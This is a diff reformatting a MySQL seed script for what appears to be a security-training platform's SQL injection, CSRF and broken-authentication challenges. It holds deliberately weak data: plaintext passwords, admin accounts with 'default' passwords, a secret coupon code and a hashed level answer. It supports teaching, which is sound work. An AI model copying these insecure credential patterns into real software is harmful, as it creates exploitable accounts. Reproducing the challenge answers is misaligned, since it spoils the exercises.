+CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`vipCoupons` (
+  `vipCouponId` INT NOT NULL,
+  `perCentOff` INT NULL,
+  `couponCode` VARCHAR(128) NULL,
+  `itemId` INT NOT NULL,
+  PRIMARY KEY (`vipCouponId`),
+  INDEX `fk_vipCoupons_items1_idx` (`itemId` ASC),
+  CONSTRAINT `fk_vipCoupons_items1`
+    FOREIGN KEY (`itemId`)
+    REFERENCES `SQLiC5Shop`.`items` (`itemId`)
     ON DELETE NO ACTION
     ON UPDATE NO ACTION)
-    ENGINE = InnoDB;
+ENGINE = InnoDB;
 
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SQLiC5Shop`.`items`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SQLiC5Shop`;
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (1, 'Pineapple', 30);
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (2, 'Orange', 3000);
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (3, 'Apple', 45);
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (4, 'Banana', 15);
+USE `SQLiC5Shop`;
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (1, 'Pineapple', 30);
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (2, 'Orange', 3000);
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (3, 'Apple', 45);
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (4, 'Banana', 15);
 
 COMMIT;
 
@@ -764,20 +444,13 @@ COMMIT;
 -- Data for table `SQLiC5Shop`.`coupons`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SQLiC5Shop`;
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (1, 100, 'PleaseTakeAFruit', 3);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (2, 100, 'FruitForFree', 3);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (3, 10, 'PleaseTakeAnOrange', 2);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (4, 50, 'HalfOffOranges', 2);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (5, 10, 'PleaseTakeABanana', 4);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (6, 50, 'HalfOffBananas', 4);
+USE `SQLiC5Shop`;
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (1, 100, 'PleaseTakeAFruit', 3);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (2, 100, 'FruitForFree', 3);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (3, 10, 'PleaseTakeAnOrange', 2);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (4, 50, 'HalfOffOranges', 2);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (5, 10, 'PleaseTakeABanana', 4);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (6, 50, 'HalfOffBananas', 4);
 
 COMMIT;
 
@@ -785,24 +458,18 @@ COMMIT;
 -- Data for table `SQLiC5Shop`.`vipCoupons`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SQLiC5Shop`;
-INSERT INTO `SQLiC5Shop`.`vipCoupons` (`vipCouponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (861267, 100, 'spcil\/|Pse3cr3etCouponStu.f4rU176', 2);
+USE `SQLiC5Shop`;
+INSERT INTO `SQLiC5Shop`.`vipCoupons` (`vipCouponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (861267, 100, 'spcil\/|Pse3cr3etCouponStu.f4rU176', 2);
 
 COMMIT;
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `SqlChalFourSuperSecure`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalFourSuperSecure` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`SqlChalFourSuperSecure` ;
+DROP SCHEMA IF EXISTS `SqlChalFourSuperSecure` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalFourSuperSecure` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `SqlChalFourSuperSecure` ;
 
 -- ======================================================
 -- SQL Injection Challenge 4
@@ -811,62 +478,32 @@ USE
 -- -----------------------------------------------------
 -- Table `SqlChalFourSuperSecure`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalFourSuperSecure`.`users`
-(
-    `idusers`
-    INT
-    NOT
-    NULL
-    AUTO_INCREMENT,
-    `userName`
-    VARCHAR
-(
-    45
-) NOT NULL,
-    `userPassword` VARCHAR
-(
-    45
-) NOT NULL,
-    PRIMARY KEY
-(
-    `idusers`
-),
-    UNIQUE INDEX `userName_UNIQUE`
-(
-    `userName` ASC
-))
-    ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlChalFourSuperSecure`.`users` (
+  `idusers` INT NOT NULL AUTO_INCREMENT,
+  `userName` VARCHAR(45) NOT NULL,
+  `userPassword` VARCHAR(45) NOT NULL,
+  PRIMARY KEY (`idusers`),
+  UNIQUE INDEX `userName_UNIQUE` (`userName` ASC))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlChalFourSuperSecure`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlChalFourSuperSecure`;
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (1, 'adam', '87i2ueeu2ndsedssda');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (2, 'player', '87iueeundsedssda');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (3, 'user', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (4, 'mark', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (5, 'sean', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (6, 'denihan', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (7, 'admin', "98y\'98hsadsoi!111,.,22ee");
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (8, 'duggan', 'password');
+USE `SqlChalFourSuperSecure`;
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (1, 'adam', '87i2ueeu2ndsedssda');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (2, 'player', '87iueeundsedssda');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (3, 'user', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (4, 'mark', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (5, 'sean', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (6, 'denihan', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (7, 'admin', "98y\'98hsadsoi!111,.,22ee");
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (8, 'duggan', 'password');
 
 COMMIT;
 
@@ -876,83 +513,44 @@ COMMIT;
 -- -----------------------------------------------------
 -- -----------------------------------------------------
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `SqlChalSix`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalSix` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`SqlChalSix` ;
+DROP SCHEMA IF EXISTS `SqlChalSix` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalSix` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `SqlChalSix` ;
 
 -- -----------------------------------------------------
 -- Table `SqlChalSix`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalSix`.`users`
-(
-    `idusers`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    45
-) NOT NULL,
-    `userPin` VARCHAR
-(
-    16
-) NOT NULL,
-    `userQuestion` VARCHAR
-(
-    128
-) NOT NULL,
-    `userAnswer` VARCHAR
-(
-    191
-) NOT NULL,
-    `userAge` VARCHAR
-(
-    16
-) NOT NULL,
-    PRIMARY KEY
-(
-    `idusers`
-))
-    ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlChalSix`.`users` (
+  `idusers` INT NOT NULL,
+  `userName` VARCHAR(45) NOT NULL,
+  `userPin` VARCHAR(16) NOT NULL,
+  `userQuestion` VARCHAR(128) NOT NULL,
+  `userAnswer` VARCHAR(191) NOT NULL,
+  `userAge` VARCHAR(16) NOT NULL,
+  PRIMARY KEY (`idusers`))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `SqlChalSix`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`SqlChalSix`;
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (1, 'George', '8367', 'What is your favourite Flower', 'A Red Rose', '23');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (2, 'Brendan', '4685', 'What is the answer to this level?',
-        '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82', '98');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (3, 'Sean', '1254', 'Your favourite Viking', 'Thor', '25');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (4, 'Anthony', '7844', 'What game do I suck at?', 'All of the games', '84');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (5, 'Owen', '4648', 'Favourite Sandwhich Topping', 'Peanutbutter', '33');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (6, 'Eoin', '2653', 'Where did I holiday in the summer of 69?', 'The Dark Side of the Moon', '12');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (7, 'David', '3598', 'This is how we get ants', "Don\'t get me started", '6');
+USE `SqlChalSix`;
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (1, 'George', '8367', 'What is your favourite Flower', 'A Red Rose', '23');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (2, 'Brendan', '4685', 'What is the answer to this level?', '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82', '98');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (3, 'Sean', '1254', 'Your favourite Viking', 'Thor', '25');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (4, 'Anthony', '7844', 'What game do I suck at?', 'All of the games', '84');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (5, 'Owen', '4648', 'Favourite Sandwhich Topping', 'Peanutbutter', '33');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (6, 'Eoin', '2653', 'Where did I holiday in the summer of 69?', 'The Dark Side of the Moon', '12');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (7, 'David', '3598', 'This is how we get ants', "Don\'t get me started", '6');
 
 COMMIT;
 
@@ -962,36 +560,22 @@ COMMIT;
 -- -----------------------------------------------------
 -- -----------------------------------------------------
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `csrfChallengeEnumTokens`;
-CREATE SCHEMA IF NOT EXISTS `csrfChallengeEnumTokens` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`csrfChallengeEnumTokens` ;
+DROP SCHEMA IF EXISTS `csrfChallengeEnumTokens` ;
+CREATE SCHEMA IF NOT EXISTS `csrfChallengeEnumTokens` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `csrfChallengeEnumTokens` ;
 
 -- -----------------------------------------------------
 -- Table `csrfChallengeEnumTokens`.`csrfTokens`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `csrfChallengeEnumTokens`.`csrfTokens`
-(
-    `userId` VARCHAR
-(
-    64
-) NOT NULL,
-    `csrfTokenscol` VARCHAR
-(
-    191
-) NULL,
-    PRIMARY KEY
-(
-    `userId`
-))
-    ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `csrfChallengeEnumTokens`.`csrfTokens` (
+  `userId` VARCHAR(64) NOT NULL,
+  `csrfTokenscol` VARCHAR(191) NULL,
+  PRIMARY KEY (`userId`))
+ENGINE = InnoDB;
 
 -- -----------------------------------------------------
 -- -----------------------------------------------------
@@ -999,36 +583,22 @@ CREATE TABLE IF NOT EXISTS `csrfChallengeEnumTokens`.`csrfTokens`
 -- -----------------------------------------------------
 -- -----------------------------------------------------
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `csrfChallengeFour`;
-CREATE SCHEMA IF NOT EXISTS `csrfChallengeFour` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`csrfChallengeFour` ;
+DROP SCHEMA IF EXISTS `csrfChallengeFour` ;
+CREATE SCHEMA IF NOT EXISTS `csrfChallengeFour` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `csrfChallengeFour` ;
 
 -- -----------------------------------------------------
 -- Table `csrfChallengeFour`.`csrfTokens`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `csrfChallengeFour`.`csrfTokens`
-(
-    `userId` VARCHAR
-(
-    64
-) NOT NULL,
-    `csrfTokenscol` VARCHAR
-(
-    191
-) NULL,
-    PRIMARY KEY
-(
-    `userId`
-))
-    ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `csrfChallengeFour`.`csrfTokens` (
+  `userId` VARCHAR(64) NOT NULL,
+  `csrfTokenscol` VARCHAR(191) NULL,
+  PRIMARY KEY (`userId`))
+ENGINE = InnoDB;
 
 -- -----------------------------------------------------
 -- -----------------------------------------------------
@@ -1036,122 +606,66 @@ CREATE TABLE IF NOT EXISTS `csrfChallengeFour`.`csrfTokens`
 -- -----------------------------------------------------
 -- -----------------------------------------------------
 
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalFive`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalFive` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalFive`;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalFive` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalFive` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalFive`;
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
 
 -- -----------------------------------------------------
 -- Table `BrokenAuthAndSessMangChalFive`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalFive`.`users`
-(
-    `userId`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    32
-) NOT NULL ,
-    `userPassword` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userAddress` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userRole` VARCHAR
-(
-    8
-) NOT NULL DEFAULT 'guest' ,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalFive`.`users` (
+  `userId` INT NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPassword` VARCHAR(128) NOT NULL ,
+  `userAddress` VARCHAR(128) NOT NULL ,
+  `userRole` VARCHAR(8) NOT NULL DEFAULT 'guest' ,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `BrokenAuthAndSessMangChalFive`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalFive`;
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
+USE `BrokenAuthAndSessMangChalFive`;
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
